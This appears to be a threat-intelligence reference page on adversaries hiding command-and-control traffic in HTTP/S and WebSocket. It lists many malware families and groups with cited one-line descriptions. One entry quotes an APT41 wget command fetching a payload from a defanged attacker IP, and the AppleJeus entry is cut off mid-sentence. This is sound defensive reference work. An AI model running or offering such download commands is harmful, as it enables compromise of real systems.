Application Layer Protocol: Web Protocols
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
Procedure Examples |
|
Name | Description |
---|---|
Mori |
Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
UPPERCUT |
UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018) |
RDAT |
RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020) |
PULSECHECK |
PULSECHECK can check HTTP request headers for a specific backdoor key and if found will output the result of the command in the variable `HTTP_X_CMD`.(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Vasport |
Vasport creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012) |
Drovorub |
Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020) |
ChChes |
ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017) |
CreepyDrive |
CreepyDrive can use HTTPS for C2 using the Microsoft Graph API.(Citation: Microsoft POLONIUM June 2022) |
Epic |
Epic uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014) |
Mongall |
Mongall can use HTTP for C2 communication.(Citation: SentinelOne Aoqin Dragon June 2022) |
Xbash |
Xbash uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018) |
SUPERNOVA |
SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020) |
LIGHTWIRE |
LIGHTWIRE can use HTTP for C2 communications.(Citation: Mandiant Cutting Edge Part 2 January 2024) |
xCaon |
xCaon has communicated with the C2 server by sending POST requests over HTTP.(Citation: Checkpoint IndigoZebra July 2021) |
Rancor |
Rancor has used HTTP for C2.(Citation: Rancor Unit42 June 2018) |
KEYPLUG |
KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41) |
QUADAGENT |
QUADAGENT uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018) |
Metador |
Metador has used HTTP for C2.(Citation: SentinelLabs Metador Sept 2022) |
Kinsing |
Kinsing has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020) |
BADNEWS |
BADNEWS establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018) |
BITTER |
BITTER has used HTTP POST requests for C2.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) |
Bankshot |
Bankshot uses HTTP for command and control communication.(Citation: McAfee Bankshot) |
Moonstone Sleet |
Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.(Citation: Microsoft Moonstone Sleet 2024) |
MacSpy |
MacSpy uses HTTP for command and control.(Citation: objsee mac malware 2017) |
LOWBALL |
LOWBALL command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338) |
QuietSieve |
QuietSieve can use HTTPS in C2 communications.(Citation: Microsoft Actinium February 2022) |
POWRUNER |
POWRUNER can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017) |
OilRig |
OilRig has used HTTP for C2.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019) |
CORESHELL |
CORESHELL can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19) |
Metamorfo |
Metamorfo has used HTTP for C2.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) |
PoshC2 |
PoshC2 can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2) |
ComRAT |
ComRAT has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) |
BLINDINGCAN |
BLINDINGCAN has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020) |
More_eggs |
More_eggs uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019) |
Proxysvc |
Proxysvc uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret) |
Crutch |
Crutch has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020) |
PcShare |
PcShare has used HTTP for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020) |
Orangeworm |
Orangeworm has used HTTP for C2.(Citation: Symantec Orangeworm IOCs April 2018) |
Out1 |
Out1 can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021) |
APT37 |
APT37 uses HTTPS to conceal C2 communications.(Citation: Talos Group123) |
Cobalt Strike |
Cobalt Strike uses a custom command and control protocol that can be encapsulated in HTTP or HTTPS, or DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual) |
Carbanak |
The Carbanak malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak) |
SNUGRIDE |
SNUGRIDE communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017) |
PLEAD |
PLEAD has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)(Citation: TrendMicro BlackTech June 2017) |
VERMIN |
VERMIN uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018) |
CozyCar |
CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke) |
Winter Vivern |
Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.(Citation: SentinelOne WinterVivern 2023)(Citation: CERT-UA WinterVivern 2023) |
Dark Caracal |
Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”.(Citation: Lookout Dark Caracal Jan 2018) |
SLOTHFULMEDIA |
SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020) |
EvilBunny |
EvilBunny has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014) |
Daggerfly |
Daggerfly uses HTTP for command and control communication.(Citation: ESET EvasivePanda 2024) |
China Chopper |
China Chopper's server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018) |
FatDuke |
FatDuke can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019) |
Hi-Zor |
Hi-Zor communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION) |
pngdowner |
pngdowner uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
Ixeshe |
Ixeshe uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012) |
DustySky |
DustySky has used both HTTP and HTTPS for C2.(Citation: DustySky) |
TSCookie |
TSCookie can use multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018) |
BUBBLEWRAP |
BUBBLEWRAP can communicate using HTTP or HTTPS.(Citation: FireEye admin@338) |
3PARA RAT |
3PARA RAT uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
BlackMould |
BlackMould can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019) |
Magic Hound |
Magic Hound has used HTTP for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021) |
Peppy |
Peppy can use HTTP to communicate with C2.(Citation: Proofpoint Operation Transparent Tribe March 2016) |
Diavol |
Diavol has used HTTP GET and POST requests for C2.(Citation: Fortinet Diavol July 2021) |
Winnti for Linux |
Winnti for Linux has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019) |
Regin |
The Regin malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin) |
ThiefQuest |
ThiefQuest uploads files via unencrypted HTTP.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis) |
Tomiris |
Tomiris can use HTTP to establish C2 communications.(Citation: Kaspersky Tomiris Sep 2021) |
Ramsay |
Ramsay has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020) |
FRAMESTING |
FRAMESTING can retrieve C2 commands from values stored in the `DSID` cookie from the current HTTP request or from decompressed zlib data within the request's `POST` data.(Citation: Mandiant Cutting Edge Part 2 January 2024) |
RainyDay |
RainyDay can use HTTP in C2 communications.(Citation: Bitdefender Naikon April 2021) |
Tropic Trooper |
Tropic Trooper has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020) |
Taidoor |
Taidoor has used HTTP GET and POST requests for C2.(Citation: TrendMicro Taidoor) |
ZxShell |
ZxShell has used HTTP for C2 connections.(Citation: Talos ZxShell Oct 2014) |
Action RAT |
Action RAT can use HTTP to communicate with C2 servers.(Citation: MalwareBytes SideCopy Dec 2021) |
CHIMNEYSWEEP |
CHIMNEYSWEEP can send `HTTP GET` requests to C2.(Citation: Mandiant ROADSWEEP August 2022) |
CreepySnail |
CreepySnail can use HTTP for C2.(Citation: Microsoft POLONIUM June 2022) |
LiteDuke |
LiteDuke can use HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019) |
KONNI |
KONNI has used HTTP POST for C2.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) |
BadPatch |
BadPatch uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017) |
Seasalt |
Seasalt uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix) |
Keydnap |
Keydnap uses HTTPS for command and control.(Citation: synack 2016 review) |
PingPull |
A PingPull variant can communicate with its C2 servers by using HTTPS.(Citation: Unit 42 PingPull Jun 2022) |
Chimera |
Chimera has used HTTPS for C2 communications.(Citation: NCC Group Chimera January 2021) |
Okrum |
Okrum uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019) |
CHOPSTICK |
Various implementations of CHOPSTICK communicate with C2 over HTTP.(Citation: ESET Sednit Part 2) |
PinchDuke |
PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.(Citation: F-Secure The Dukes) |
Dacls |
Dacls can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020) |
Sakula |
Sakula uses HTTP for C2.(Citation: Dell Sakula) |
Saint Bot |
Saint Bot has used HTTP for C2 communications.(Citation: Malwarebytes Saint Bot April 2021) |
POWERTON |
POWERTON has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail) |
Mythic |
Mythic supports HTTP-based C2 profiles.(Citation: Mythc Documentation) |
ServHelper |
ServHelper uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019) |
Raccoon Stealer |
Raccoon Stealer uses HTTP, and particularly HTTP POST requests, for command and control actions.(Citation: S2W Racoon 2022)(Citation: Sekoia Raccoon1 2022)(Citation: Sekoia Raccoon2 2022) |
Valak |
Valak has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020) |
CloudDuke |
One variant of CloudDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
GravityRAT |
GravityRAT uses HTTP for C2.(Citation: Talos GravityRAT) |
DEATHRANSOM |
DEATHRANSOM can use HTTPS to download files.(Citation: FireEye FiveHands April 2021) |
Dridex |
Dridex has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021) |
AppleJeus |
AppleJeus has sent data to its C2 server via |
ANDROMEDA |
ANDROMEDA has the ability to make GET requests to download files from C2.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Exaramel for Linux |
Exaramel for Linux uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021) |
4H RAT |
4H RAT uses HTTP for command and control.(Citation: CrowdStrike Putter Panda) |
HAMMERTOSS |
The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.(Citation: FireEye APT29) |
During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.(Citation: FoxIT Wocao December 2019) |
|
HAWKBALL |
HAWKBALL has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019) |
Smoke Loader |
Smoke Loader uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016) |
LuminousMoth |
LuminousMoth has used HTTP for C2.(Citation: Kaspersky LuminousMoth July 2021) |
KOPILUWAK |
KOPILUWAK has used HTTP POST requests to send data to C2.(Citation: Mandiant Suspected Turla Campaign February 2023) |
Uroburos |
Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023) |
Felismus |
Felismus uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017) |
BoomBox |
BoomBox has used HTTP POST requests for C2.(Citation: MSTIC Nobelium Toolset May 2021) |
P.A.S. Webshell |
P.A.S. Webshell can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021) |
GreyEnergy |
GreyEnergy uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018) |
Aria-body |
Aria-body has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020) |
Helminth |
Helminth can use HTTP for C2.(Citation: Palo Alto OilRig May 2016) |
JHUHUGIT |
JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017) |
APT19 |
APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016) |
APT41 |
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) |
SoreFang |
SoreFang can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020) |
Mustang Panda |
Mustang Panda has communicated with its C2 via HTTP POST requests.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021) |
S-Type |
S-Type uses HTTP for C2.(Citation: Cylance Dust Storm) |
HyperBro |
HyperBro has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019) |
RGDoor |
RGDoor uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018) |
Emotet |
Emotet has used HTTP for command and control.(Citation: Binary Defense Emotes Wi-Fi Spreader) |
Pteranodon |
Pteranodon can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017) |
ABK |
ABK has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019) |
FELIXROOT |
FELIXROOT uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018) |
BADHATCH |
BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) |
Koadic |
Koadic has used HTTP for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021) |
APT38 |
APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018) |
BACKSPACE |
BACKSPACE uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30) |
RATANKBA |
RATANKBA uses HTTP/HTTPS for command and control communication.(Citation: Lazarus RATANKBA)(Citation: RATANKBA) |
BBK |
BBK has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019) |
Psylo |
Psylo uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016) |
BRONZE BUTLER |
BRONZE BUTLER malware has used HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017) |
SVCReady |
SVCReady can communicate with its C2 servers via HTTP.(Citation: HP SVCReady Jun 2022) |
WindTail |
WindTail has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019) |
MechaFlounder |
MechaFlounder has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019) |
FoggyWeb |
FoggyWeb has the ability to communicate with C2 servers over HTTP GET/POST requests.(Citation: MSTIC FoggyWeb September 2021) |
QakBot |
QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021) |
Agent Tesla |
Agent Tesla has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017) |
Crimson |
Crimson can use a HTTP GET request to download its final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016) |
Sidewinder |
Sidewinder has used HTTP in C2 communications.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020) |
Gazer |
Gazer communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017) |
NETEAGLE |
NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.(Citation: FireEye APT30) |
WhisperGate |
WhisperGate can make an HTTPS connection to download additional files.(Citation: Unit 42 WhisperGate January 2022)(Citation: Medium S2W WhisperGate January 2022) |
UBoatRAT |
UBoatRAT has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017) |
CSPY Downloader |
CSPY Downloader can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020) |
Kimsuky |
Kimsuky has used HTTP GET and POST requests for C2.(Citation: Talos Kimsuky Nov 2021) |
STARWHALE |
STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
During Frankenstein, the threat actors used HTTP GET requests for C2.(Citation: Talos Frankenstein June 2019) |
|
Lazarus Group |
Lazarus Group has conducted C2 over HTTP and HTTPS.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021) |
Raspberry Robin |
Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.(Citation: RedCanary RaspberryRobin 2022) Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.(Citation: HP RaspberryRobin 2024) |
Avenger |
Avenger has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019) |
AuTo Stealer |
AuTo Stealer can use HTTP to communicate with its C2 servers.(Citation: MalwareBytes SideCopy Dec 2021) |
Remexi |
Remexi uses BITSAdmin to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019) |
PlugX |
PlugX can be configured to use HTTP for command and control.(Citation: Dell TG-3390)(Citation: Proofpoint TA416 Europe March 2022) |
OSX_OCEANLOTUS.D |
OSX_OCEANLOTUS.D can also use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020) |
OopsIE |
OopsIE uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018) |
Zebrocy |
Zebrocy uses HTTP for C2.(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)(Citation: Accenture SNAKEMACKEREL Nov 2018) |
PoetRAT |
PoetRAT has used HTTP and HTTPS for C2 communications.(Citation: Talos PoetRAT October 2020) |
SMOKEDHAM |
SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.(Citation: FireEye SMOKEDHAM June 2021) |
StrongPity |
StrongPity can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020) |
Pandora |
Pandora can communicate over HTTP.(Citation: Trend Micro Iron Tiger April 2021) |
Donut |
Donut can use HTTP to download previously staged shellcode payloads.(Citation: Donut Github) |
SpeakUp |
SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.(Citation: CheckPoint SpeakUp Feb 2019) |
Higaisa |
Higaisa used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) |
Milan |
Milan can use HTTPS for communication with C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021) |
Emissary |
Emissary uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015) |
Anchor |
Anchor has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019) |
RedCurl |
RedCurl has used HTTP, HTTPS and WebDAV protocols for C2 communications.(Citation: group-ib_redcurl1)(Citation: group-ib_redcurl2) |
During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41) |
|
MCMD |
MCMD can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019) |
ELMER |
ELMER uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2) |
MuddyWater |
MuddyWater has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021) |
Mafalda |
Mafalda can use HTTP for C2.(Citation: SentinelLabs Metador Sept 2022) |
Stealth Falcon |
Stealth Falcon malware communicates with its C2 server via HTTPS.(Citation: Citizen Lab Stealth Falcon May 2016) |
Latrodectus |
Latrodectus can send registration information to C2 via HTTP `POST`.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
LookBack |
LookBack’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019) |
YAHOYAH |
YAHOYAH uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015) |
APT32 |
APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017) |
Squirrelwaffle |
Squirrelwaffle has used HTTP POST requests for C2 communications.(Citation: ZScaler Squirrelwaffle Sep 2021) |
Reaver |
Some Reaver variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017) |
DanBot |
DanBot can use HTTP in C2 communication.(Citation: SecureWorks August 2019) |
Rising Sun |
Rising Sun has used HTTP and HTTPS for command and control.(Citation: McAfee Sharpshooter December 2018) |
During Night Dragon, threat actors used HTTP for C2.(Citation: McAfee Night Dragon) |
|
NGLite |
NGLite will initially beacon out to the NKN network via an HTTP POST over TCP 30003.(Citation: NGLite Trojan) |
RCSession |
RCSession can use HTTP in C2 communications.(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020) |
Comnie |
Comnie uses HTTP for C2 communication.(Citation: Palo Alto Comnie) |
Inception |
Inception has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018) |
BBSRAT |
BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT) |
WIRTE |
WIRTE has used HTTP for network communication.(Citation: Lab52 WIRTE Apr 2019) |
ShimRat |
ShimRat communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang) |
Dyre |
Dyre uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015) |
Stuxnet |
Stuxnet uses HTTP to communicate with a command and control server.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) |
LunarWeb |
LunarWeb can use `POST` to send victim identification to C2 and `GET` to retrieve commands.(Citation: ESET Turla Lunar toolset May 2024) |
Turla |
Turla has used HTTP and HTTPS for C2 communications.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018) |
Cuckoo Stealer |
Cuckoo Stealer can use the curl API for C2 communications.(Citation: Kandji Cuckoo April 2024) |
Dipsind |
Dipsind uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016) |
Pupy |
Pupy can communicate over HTTP for C2.(Citation: GitHub Pupy) |
Flagpro |
Flagpro can communicate with its C2 using HTTP.(Citation: NTT Security Flagpro new December 2021) |
FIN13 |
FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022) |
SLIGHTPULSE |
SLIGHTPULSE has the ability to process HTTP GET requests as a normal web server and to insert logic that will read or write files or execute commands in response to HTTP POST requests.(Citation: Mandiant Pulse Secure Zero-Day April 2021) |
Machete |
Machete uses HTTP for Command & Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020) |
SilverTerrier |
SilverTerrier uses HTTP for C2 communications.(Citation: Unit42 SilverTerrier 2018) |
APT28 |
Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) |
During C0021, the threat actors used HTTP for some of their C2 communications.(Citation: FireEye APT29 Nov 2018) |
|
Torisma |
Torisma can use HTTP and HTTPS for C2 communications.(Citation: McAfee Lazarus Nov 2020) |
Bisonal |
Bisonal has used HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020) |
SideTwist |
SideTwist has used HTTP GET and POST requests over port 443 for C2.(Citation: Check Point APT34 April 2021) |
Goopy |
Goopy has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017) |
Machete |
Machete malware used Python’s urllib library to make HTTP requests to the C2 server.(Citation: Cylance Machete Mar 2017) |
Hikit |
Hikit has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2) |
Sliver |
Sliver has the ability to support C2 communications over HTTP/S.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2) |
Final1stspy |
Final1stspy uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018) |
GoldenSpy |
GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020) |
UNC2452 |
UNC2452 used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds) |
TrailBlazer |
TrailBlazer has used HTTP requests for C2.(Citation: CrowdStrike StellarParticle January 2022) |
Kevin |
Variants of Kevin can communicate with C2 over HTTP.(Citation: Kaspersky Lyceum October 2021) |
CharmPower |
CharmPower can use HTTP to communicate with C2.(Citation: Check Point APT35 CharmPower January 2022) |
Wizard Spider |
Wizard Spider has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019) |
DarkWatchman |
DarkWatchman uses HTTPS for command and control.(Citation: Prevailion DarkWatchman 2021) |
Ursnif |
Ursnif has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016) |
Empire |
Empire can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire) |
ADVSTORESHELL |
ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy) |
FlawedAmmyy |
FlawedAmmyy has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018) |
Mis-Type |
Mis-Type network traffic can communicate over HTTP.(Citation: Cylance Dust Storm) |
Doki |
Doki has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20) |
Covenant |
Covenant can establish command and control via HTTP.(Citation: Github Covenant) |
Maze |
Maze has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020) |
metaMain |
metaMain can use HTTP for C2 communications.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022) |
LitePower |
LitePower can use HTTP and HTTPS for C2 communications.(Citation: Kaspersky WIRTE November 2021) |
WinMM |
WinMM uses HTTP for C2.(Citation: Baumgartner Naikon 2015) |
Woody RAT |
Woody RAT can communicate with its C2 server using HTTP requests.(Citation: MalwareBytes WoodyRAT Aug 2022) |
SeaDuke |
SeaDuke uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes) |
Night Dragon |
Night Dragon has used HTTP for C2.(Citation: McAfee Night Dragon) |
njRAT |
njRAT has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018) |
